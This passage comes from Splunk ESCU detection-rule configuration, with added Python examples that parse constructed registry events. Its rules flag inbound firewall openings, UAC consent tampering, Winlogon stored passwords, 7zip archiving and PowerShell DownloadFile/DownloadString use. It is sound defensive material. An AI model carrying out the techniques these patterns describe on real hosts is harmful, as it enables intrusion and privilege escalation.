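Each value under the FirewallRules key is a pipe-delimited rule string (`v2.31|Action=Allow|Active=TRUE|Dir=In|Protocol=6|Profile=Public|LPort=3389|...|`), which is what the `*|Action=Allow|*`, `*|Dir=In|*` and `*|LPort=*` wildcards above are matching. The Python below is an added example, not ESCU code, that parses that string into fields over constructed Sysmon-style registry events, applies the search's condition, and separately reports whether the rule reaches the Public profile, which the description mentions but the search does not test. The `Profile` token repeats once per profile and is absent when a rule applies to all profiles, so the two conditions differ. The sample events, GUIDs, hosts and users are invented; the last event sits under the Group Policy key (HKLM\SOFTWARE\Policies\Microsoft\WindowsFirewall\FirewallRules), which the search's path wildcard does not cover.

```python
"""Parse Windows Firewall rule strings from the FirewallRules registry key
and apply the inbound-allow rule. Added example, not Splunk ESCU code; the
events below are constructed."""
import re

# The key the ESCU search wildcards on (local rules only).
FW_KEY_RE = re.compile(
    r"\\System\\CurrentControlSet\\Services\\SharedAccess\\Parameters\\FirewallPolicy\\FirewallRules\\",
    re.IGNORECASE)


def parse_fw_rule(value_data):
    """Split 'v2.31|Action=Allow|Active=TRUE|Dir=In|...|' into a dict. The
    Profile token may repeat (one per profile), so it is collected as a list;
    a rule with no Profile token applies to every profile."""
    fields = value_data.split("|")
    rule = {"Version": fields[0], "Profile": []}
    for f in fields[1:]:
        if "=" not in f:
            continue
        key, value = f.split("=", 1)
        if key == "Profile":
            rule["Profile"].append(value)
        else:
            rule[key] = value
    return rule


def is_inbound_allow(rule):
    """What the ESCU search tests: Action=Allow, Dir=In and a local port."""
    return rule.get("Action") == "Allow" and rule.get("Dir") == "In" and "LPort" in rule


def reaches_public(rule):
    """Description-level condition: the rule is active on the Public profile,
    explicitly or because it carries no profile restriction."""
    return not rule["Profile"] or "Public" in rule["Profile"]


# Constructed CIM Endpoint.Registry events; not real telemetry.
LOCAL_KEY = r"HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules"
GPO_KEY = r"HKLM\SOFTWARE\Policies\Microsoft\WindowsFirewall\FirewallRules"
SAMPLE_REGISTRY_EVENTS = [
    {"dest": "ws01", "user": "CORP\\admin", "registry_path": LOCAL_KEY + r"\{11111111-0000-0000-0000-000000000001}",
     "registry_value_name": "{11111111-0000-0000-0000-000000000001}",
     "registry_value_data": r"v2.31|Action=Allow|Active=TRUE|Dir=In|Protocol=6|Profile=Public|LPort=3389|Name=Remote Desktop|Desc=Allow RDP|"},
    {"dest": "srv01", "user": "SYSTEM", "registry_path": LOCAL_KEY + r"\WINRM-HTTP-In-TCP",
     "registry_value_name": "WINRM-HTTP-In-TCP",
     "registry_value_data": r"v2.31|Action=Allow|Active=TRUE|Dir=In|Protocol=6|Profile=Domain|Profile=Private|LPort=5985|App=%SystemRoot%\System32\svchost.exe|Svc=WinRM|Name=WinRM-HTTP-In-TCP|"},
    {"dest": "ws02", "user": "CORP\\bob", "registry_path": LOCAL_KEY + r"\{22222222-0000-0000-0000-000000000002}",
     "registry_value_name": "{22222222-0000-0000-0000-000000000002}",
     "registry_value_data": r"v2.31|Action=Allow|Active=TRUE|Dir=In|Protocol=6|LPort=4444|App=C:\Users\Public\svc.exe|Name=svc|"},
    {"dest": "ws02", "user": "CORP\\bob", "registry_path": LOCAL_KEY + r"\{33333333-0000-0000-0000-000000000003}",
     "registry_value_name": "{33333333-0000-0000-0000-000000000003}",
     "registry_value_data": r"v2.31|Action=Block|Active=TRUE|Dir=In|Protocol=6|LPort=445|Name=Block SMB|"},
    {"dest": "ws02", "user": "CORP\\bob", "registry_path": LOCAL_KEY + r"\{44444444-0000-0000-0000-000000000004}",
     "registry_value_name": "{44444444-0000-0000-0000-000000000004}",
     "registry_value_data": r"v2.31|Action=Allow|Active=TRUE|Dir=Out|Protocol=6|RPort=443|Name=HTTPS out|"},
    {"dest": "ws03", "user": "SYSTEM", "registry_path": GPO_KEY + r"\{55555555-0000-0000-0000-000000000005}",
     "registry_value_name": "{55555555-0000-0000-0000-000000000005}",
     "registry_value_data": r"v2.31|Action=Allow|Active=TRUE|Dir=In|Protocol=6|Profile=Public|LPort=22|Name=SSH|"},
]


def scan(events):
    """Apply the rule to registry events and annotate each finding with the
    parsed port, application, profiles and Public exposure."""
    findings = []
    for ev in events:
        if not FW_KEY_RE.search(ev["registry_path"]):
            continue
        rule = parse_fw_rule(ev["registry_value_data"])
        if not is_inbound_allow(rule):
            continue
        findings.append({"dest": ev["dest"], "user": ev["user"],
                         "rule_name": rule.get("Name"), "LPort": rule["LPort"],
                         "App": rule.get("App"), "Profile": rule["Profile"],
                         "public": reaches_public(rule)})
    return findings


if __name__ == "__main__":
    for finding in scan(SAMPLE_REGISTRY_EVENTS):
        print(finding)
```

The WinRM rule is a finding under the search's condition but is not Public-exposed, while the `svc.exe` rule with no Profile token is; a tuned version of this search would parse the value string the same way and weight the risk score by profile and by whether `App` points outside `%SystemRoot%` or `%ProgramFiles%`.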
action.notable.param.rule_title = Allow Inbound Traffic By Firewall Rule Registry action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime FROM datamodel=Endpoint.Registry WHERE (Registry.registry_path= "*\\System\\CurrentControlSet\\Services\\SharedAccess\\Parameters\\FirewallPolicy\\FirewallRules\\*" Registry.registry_value_data = "*|Action=Allow|*" Registry.registry_value_data = "*|Dir=In|*" Registry.registry_value_data = "*|LPort=*") BY _time span=1h Registry.registry_path Registry.registry_key_name Registry.registry_value_name Registry.registry_value_data Registry.process_guid Registry.dest Registry.user | `drop_dm_object_name(Registry)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `allow_inbound_traffic_by_firewall_rule_registry_filter` [ESCU - Allow Inbound Traffic In Firewall Rule - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies a suspicious PowerShell command that allows inbound traffic to a specific local port, typically within the Public profile (for example New-NetFirewallRule -Direction Inbound -Action Allow -LocalPort ...). This technique was seen in attackers who want remote access to a machine and allow the traffic with a firewall rule. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1021.001", "T1021"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = The following analytic identifies a suspicious PowerShell command that allows inbound traffic to a specific local port, typically within the Public profile (for example New-NetFirewallRule -Direction Inbound -Action Allow -LocalPort ...). This technique was seen in attackers who want remote access to a machine and allow the traffic with a firewall rule. 
action.escu.how_to_implement = To successfully implement this search, you need to be ingesting the PowerShell Operational log (EventCode 4104) from your endpoints. Make sure PowerShell Script Block Logging is enabled, through Group Policy or the corresponding registry setting, so that these events are generated. action.escu.known_false_positives = Administrators may legitimately allow inbound traffic on certain networks or machines. Filter as needed. action.escu.creation_date = 2021-05-19 action.escu.modification_date = 2021-05-19 action.escu.confidence = high action.escu.full_search_name = ESCU - Allow Inbound Traffic In Firewall Rule - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Windows"] action.escu.analytic_story = ["Prohibited Traffic Allowed or Protocol Mismatch"] action.risk = 1 action.risk.param._risk_message = Suspicious firewall modification detected on endpoint $dest$ by user $user$. action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 3}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 3}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Allow Inbound Traffic In Firewall Rule - Rule action.correlationsearch.annotations = {"analytic_story": ["Prohibited Traffic Allowed or Protocol Mismatch"], "cis20": ["CIS 10"], "confidence": 30, "impact": 10, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1021.001", "T1021"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic identifies a suspicious PowerShell command that allows inbound traffic to a specific local port, typically within the Public profile (for example New-NetFirewallRule -Direction Inbound -Action Allow -LocalPort ...). 
This technique was seen in attackers who want remote access to a machine and allow the traffic with a firewall rule. action.notable.param.rule_title = Allow Inbound Traffic In Firewall Rule action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `powershell` EventCode=4104 Message = "*firewall*" Message = "*Inbound*" Message = "*Allow*" Message = "*-LocalPort*" | stats count min(_time) as firstTime max(_time) as lastTime by EventCode Message ComputerName User | rename ComputerName as dest, User as user | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `allow_inbound_traffic_in_firewall_rule_filter` [ESCU - Allow Network Discovery In Firewall - Rule] action.escu = 0 action.escu.enabled = 1 description = This search detects a suspicious modification of the Windows Firewall that enables the Network Discovery rule group. This technique was seen in a couple of ransomware families (revil, reddot) to discover other machines connected to the compromised host and encrypt more files. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1562.007", "T1562"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This search detects a suspicious modification of the Windows Firewall that enables the Network Discovery rule group. This technique was seen in a couple of ransomware families (revil, reddot) to discover other machines connected to the compromised host and encrypt more files. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. 
Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = network admin may modify this firewall feature that may cause this rule to be triggered. action.escu.creation_date = 2021-06-23 action.escu.modification_date = 2021-06-23 action.escu.confidence = high action.escu.full_search_name = ESCU - Allow Network Discovery In Firewall - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Ransomware", "Revil Ransomware", "BlackByte Ransomware", "NjRAT"] action.risk = 1 action.risk.param._risk_message = Suspicious modification to the firewall to allow network discovery detected on host - $dest$ action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 25}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Allow Network Discovery In Firewall - Rule action.correlationsearch.annotations = {"analytic_story": ["Ransomware", "Revil Ransomware", "BlackByte Ransomware", "NjRAT"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1562.007", "T1562"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This 
search detects a suspicious modification of the Windows Firewall that enables the Network Discovery rule group. This technique was seen in a couple of ransomware families (revil, reddot) to discover other machines connected to the compromised host and encrypt more files. action.notable.param.rule_title = Allow Network Discovery In Firewall action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where `process_netsh` Processes.process= "*firewall*" Processes.process= "*group=\"Network Discovery\"*" Processes.process="*enable*" Processes.process="*Yes*" by Processes.dest Processes.user Processes.parent_process Processes.original_file_name Processes.process_name Processes.process Processes.process_id Processes.parent_process_id Processes.parent_process_name | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `allow_network_discovery_in_firewall_filter` [ESCU - Allow Operation with Consent Admin - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytic identifies a potential privilege escalation attempt through tampering with the UAC consent policy. Setting ConsentPromptBehaviorAdmin to 0 configures UAC to elevate administrators without prompting for consent or credentials, so any operation that requires elevation proceeds silently. This has been observed in attacker tooling and malware used to gain elevated privileges on the compromised machine. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1548"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This analytic identifies a potential privilege escalation attempt through tampering with the UAC consent policy. 
Setting ConsentPromptBehaviorAdmin to 0 configures UAC to elevate administrators without prompting for consent or credentials, so any operation that requires elevation proceeds silently. This has been observed in attacker tooling and malware used to gain elevated privileges on the compromised machine. action.escu.how_to_implement = To successfully implement this search, you need to be ingesting logs with the registry value name, registry path, and registry value data from your endpoints. If you are using Sysmon, you must have at least version 2.0 of the official Sysmon TA. https://splunkbase.splunk.com/app/5709 action.escu.known_false_positives = Administrators or configuration management tooling may set this policy deliberately. Filter as needed. action.escu.creation_date = 2023-03-29 action.escu.modification_date = 2023-03-29 action.escu.confidence = high action.escu.full_search_name = ESCU - Allow Operation with Consent Admin - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Ransomware", "Windows Registry Abuse", "Azorult"] action.risk = 1 action.risk.param._risk_message = Suspicious registry modification was performed on endpoint $dest$ by user $user$. This behavior is indicative of privilege escalation. 
action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 25}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 25}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Allow Operation with Consent Admin - Rule action.correlationsearch.annotations = {"analytic_story": ["Ransomware", "Windows Registry Abuse", "Azorult"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1548"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This analytic identifies a potential privilege escalation attempt through tampering with the UAC consent policy. Setting ConsentPromptBehaviorAdmin to 0 configures UAC to elevate administrators without prompting for consent or credentials, so any operation that requires elevation proceeds silently. This has been observed in attacker tooling and malware used to gain elevated privileges on the compromised machine. 
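The Active Setup, DefaultUser And Password and Consent Admin rules in this section share one shape: a registry path wildcard, a value-name match and, for the UAC rule, a value-data match. The Python below is an added example, not ESCU code, that runs all three over constructed Sysmon-style registry events. It also shows two points the SPL as printed does not: the Winlogon search has no parentheses, and because AND binds tighter than OR in SPL it fires on a DefaultUserName value under any key, which `winlogon_as_written` reproduces beside the intended grouping; and Sysmon renders DWORD values as `DWORD (0x00000000)`, so the data comparison normalises that form. The Active Setup pattern here goes slightly beyond the search by also covering the Wow6432Node view of the key, which the `*\SOFTWARE\Microsoft\Active Setup*` wildcard does not match. Events, GUIDs, hosts and users are invented.

```python
"""Registry-value rules from this section applied to constructed Sysmon
registry events. Added example, not Splunk ESCU code."""
import re

# Sysmon renders a DWORD value as "DWORD (0x00000000)"; the ESCU search
# compares the bare hex, so normalise to that form.
DWORD_RE = re.compile(r"^(?:DWORD|QWORD) \((0x[0-9A-Fa-f]+)\)$")


def normalize_data(value_data):
    m = DWORD_RE.match(value_data.strip())
    return m.group(1) if m else value_data


RULES = [
    {"name": "Active Setup Registry Autostart",
     # also matches the Wow6432Node view of the key
     "path": re.compile(r"\\SOFTWARE\\(Wow6432Node\\)?Microsoft\\Active Setup\\Installed Components\\", re.I),
     "values": {"stubpath"}, "data": None},
    {"name": "Add DefaultUser And Password In Registry",
     "path": re.compile(r"\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon", re.I),
     "values": {"defaultusername", "defaultpassword"}, "data": None},
    {"name": "Allow Operation with Consent Admin",
     "path": re.compile(r"\\Microsoft\\Windows\\CurrentVersion\\Policies\\System", re.I),
     "values": {"consentpromptbehavioradmin"}, "data": "0x00000000"},
]


def evaluate(event, rule):
    """path AND value-name AND (optional) value-data, explicitly grouped."""
    if not rule["path"].search(event["registry_path"]):
        return False
    if event["registry_value_name"].lower() not in rule["values"]:
        return False
    if rule["data"] is not None and normalize_data(event["registry_value_data"]) != rule["data"]:
        return False
    return True


def winlogon_as_written(event):
    """The Winlogon search without parentheses. SPL evaluates it as
    (path AND name=DefaultPassword) OR name=DefaultUserName, so a
    DefaultUserName value under any key matches."""
    on_path = bool(RULES[1]["path"].search(event["registry_path"]))
    name = event["registry_value_name"].lower()
    return (on_path and name == "defaultpassword") or name == "defaultusername"


# Constructed CIM Endpoint.Registry events; not real telemetry.
SAMPLE_EVENTS = [
    {"dest": "ws01", "user": "CORP\\alice",
     "registry_path": r"HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components\{A1B2C3D4-0000-0000-0000-000000000001}\StubPath",
     "registry_value_name": "StubPath", "registry_value_data": r"C:\Users\Public\update.exe"},
    {"dest": "ws01", "user": "CORP\\alice",
     "registry_path": r"HKLM\SOFTWARE\Wow6432Node\Microsoft\Active Setup\Installed Components\{A1B2C3D4-0000-0000-0000-000000000002}\StubPath",
     "registry_value_name": "StubPath", "registry_value_data": r"C:\ProgramData\svc.exe"},
    {"dest": "ws02", "user": "CORP\\bob",
     "registry_path": r"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\DefaultPassword",
     "registry_value_name": "DefaultPassword", "registry_value_data": "Summer2024!"},
    {"dest": "ws02", "user": "CORP\\bob",
     "registry_path": r"HKLM\SOFTWARE\Vendor\Agent\DefaultUserName",
     "registry_value_name": "DefaultUserName", "registry_value_data": "agent"},
    {"dest": "ws03", "user": "CORP\\carol",
     "registry_path": r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin",
     "registry_value_name": "ConsentPromptBehaviorAdmin", "registry_value_data": "DWORD (0x00000000)"},
    {"dest": "ws03", "user": "CORP\\carol",
     "registry_path": r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin",
     "registry_value_name": "ConsentPromptBehaviorAdmin", "registry_value_data": "DWORD (0x00000005)"},
    {"dest": "ws02", "user": "CORP\\bob",
     "registry_path": r"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell",
     "registry_value_name": "Shell", "registry_value_data": "explorer.exe"},
]


def scan(events, rules=RULES):
    """One finding per (event, rule) pair that evaluates true."""
    return [{"rule": r["name"], "dest": ev["dest"], "user": ev["user"],
             "registry_path": ev["registry_path"],
             "registry_value_data": normalize_data(ev["registry_value_data"])}
            for ev in events for r in rules if evaluate(ev, r)]


if __name__ == "__main__":
    for finding in scan(SAMPLE_EVENTS):
        print(finding)
    print("as-written Winlogon search flags vendor key:", winlogon_as_written(SAMPLE_EVENTS[3]))
```

The vendor-key `DefaultUserName` event is the one to watch: the grouped rule ignores it, the as-written SPL raises a notable for it, and in a real estate every agent that stores a default account name under its own key would do the same.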
action.notable.param.rule_title = Allow Operation with Consent Admin action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime FROM datamodel=Endpoint.Registry WHERE (Registry.registry_path= "*\\Microsoft\\Windows\\CurrentVersion\\Policies\\System*" Registry.registry_value_name = ConsentPromptBehaviorAdmin Registry.registry_value_data = "0x00000000") BY _time span=1h Registry.registry_path Registry.registry_key_name Registry.registry_value_name Registry.registry_value_data Registry.process_guid Registry.dest Registry.user | `drop_dm_object_name(Registry)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `allow_operation_with_consent_admin_filter` [ESCU - Anomalous usage of 7zip - Rule] action.escu = 0 action.escu.enabled = 1 description = The following detection identifies a 7z.exe spawned from `Rundll32.exe` or `Dllhost.exe`. It is assumed that the adversary has brought in `7z.exe` and `7z.dll`. It has been observed that an adversary will rename `7z.exe`. Additional coverage may be required to identify the behavior of renamed instances of `7z.exe`. During triage, identify the source of injection into `Rundll32.exe` or `Dllhost.exe`. Capture any files written to disk and analyze as needed. Review parallel processes for additional behaviors. Typically, archiving files precedes exfiltration. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1560.001", "T1560"], "nist": ["DE.AE"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The following detection identifies a 7z.exe spawned from `Rundll32.exe` or `Dllhost.exe`. It is assumed that the adversary has brought in `7z.exe` and `7z.dll`. 
It has been observed where an adversary will rename `7z.exe`. Additional coverage may be required to identify the behavior of renamed instances of `7z.exe`. During triage, identify the source of injection into `Rundll32.exe` or `Dllhost.exe`. Capture any files written to disk and analyze as needed. Review parallel processes for additional behaviors. Typically, archiving files will result in exfiltration. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = False positives should be limited as this behavior is not normal for `rundll32.exe` or `dllhost.exe` to spawn and run 7zip. 
action.escu.creation_date = 2023-11-07 action.escu.modification_date = 2023-11-07 action.escu.confidence = high action.escu.full_search_name = ESCU - Anomalous usage of 7zip - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["NOBELIUM Group", "BlackByte Ransomware", "Cobalt Strike", "Graceful Wipe Out Attack"] action.risk = 1 action.risk.param._risk_message = An instance of $parent_process_name$ spawning $process_name$ was identified on endpoint $dest$ by user $user$. This behavior is indicative of suspicious loading of 7zip. action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 64}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 64}, {"risk_object_field": "parent_process_name", "risk_object_type": "other", "risk_score": 64}, {"risk_object_field": "process_name", "risk_object_type": "other", "risk_score": 64}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Anomalous usage of 7zip - Rule action.correlationsearch.annotations = {"analytic_story": ["NOBELIUM Group", "BlackByte Ransomware", "Cobalt Strike", "Graceful Wipe Out Attack"], "cis20": ["CIS 10"], "confidence": 80, "impact": 80, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1560.001", "T1560"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime 
max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.parent_process_name IN ("rundll32.exe", "dllhost.exe") Processes.process_name=*7z* by Processes.dest Processes.user Processes.parent_process Processes.parent_process_name Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)`| `anomalous_usage_of_7zip_filter` [ESCU - Any Powershell DownloadFile - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies the use of PowerShell downloading a file using `DownloadFile` method. This particular method is utilized in many different PowerShell frameworks to download files and output to disk. Identify the source (IP/domain) and destination file and triage appropriately. If AMSI logging or PowerShell transaction logs are available, review for further details of the implant. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation", "Command and Control"], "mitre_attack": ["T1059", "T1059.001", "T1105"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The following analytic identifies the use of PowerShell downloading a file using `DownloadFile` method. This particular method is utilized in many different PowerShell frameworks to download files and output to disk. Identify the source (IP/domain) and destination file and triage appropriately. If AMSI logging or PowerShell transaction logs are available, review for further details of the implant. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. 
Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = False positives may be present and filtering will need to occur by parent process or command line argument. It may be required to modify this query to an EDR product for more granular coverage. action.escu.creation_date = 2023-04-14 action.escu.modification_date = 2023-04-14 action.escu.confidence = high action.escu.full_search_name = ESCU - Any Powershell DownloadFile - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["DarkCrystal RAT", "Ingress Tool Transfer", "Hermetic Wiper", "Malicious PowerShell", "Data Destruction", "Log4Shell CVE-2021-44228", "Phemedrone Stealer"] action.risk = 1 action.risk.param._risk_message = An instance of $parent_process_name$ spawning $process_name$ was identified on endpoint $dest$ by user $user$. This behavior identifies the use of DownloadFile within PowerShell. 
action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 56}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 56}, {"risk_object_field": "parent_process_name", "risk_object_type": "other", "risk_score": 56}, {"risk_object_field": "process_name", "risk_object_type": "other", "risk_score": 56}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Any Powershell DownloadFile - Rule action.correlationsearch.annotations = {"analytic_story": ["DarkCrystal RAT", "Ingress Tool Transfer", "Hermetic Wiper", "Malicious PowerShell", "Data Destruction", "Log4Shell CVE-2021-44228", "Phemedrone Stealer"], "cis20": ["CIS 10"], "confidence": 70, "cve": ["CVE-2021-44228"], "impact": 80, "kill_chain_phases": ["Installation", "Command and Control"], "mitre_attack": ["T1059", "T1059.001", "T1105"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic identifies the use of PowerShell downloading a file using `DownloadFile` method. This particular method is utilized in many different PowerShell frameworks to download files and output to disk. Identify the source (IP/domain) and destination file and triage appropriately. If AMSI logging or PowerShell transaction logs are available, review for further details of the implant. 
action.notable.param.rule_title = Any Powershell DownloadFile action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where `process_powershell` Processes.process=*DownloadFile* by Processes.dest Processes.user Processes.parent_process Processes.process_name Processes.parent_process_name Processes.original_file_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)`| `security_content_ctime(lastTime)`| `any_powershell_downloadfile_filter` [ESCU - Any Powershell DownloadString - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies the use of PowerShell downloading a file using `DownloadString` method. This particular method is utilized in many different PowerShell frameworks to download files and output to disk. Identify the source (IP/domain) and destination file and triage appropriately. If AMSI logging or PowerShell transaction logs are available, review for further details of the implant. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation", "Command and Control"], "mitre_attack": ["T1059", "T1059.001", "T1105"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The following analytic identifies the use of PowerShell downloading a file using `DownloadString` method. This particular method is utilized in many different PowerShell frameworks to download files and output to disk. Identify the source (IP/domain) and destination file and triage appropriately. 
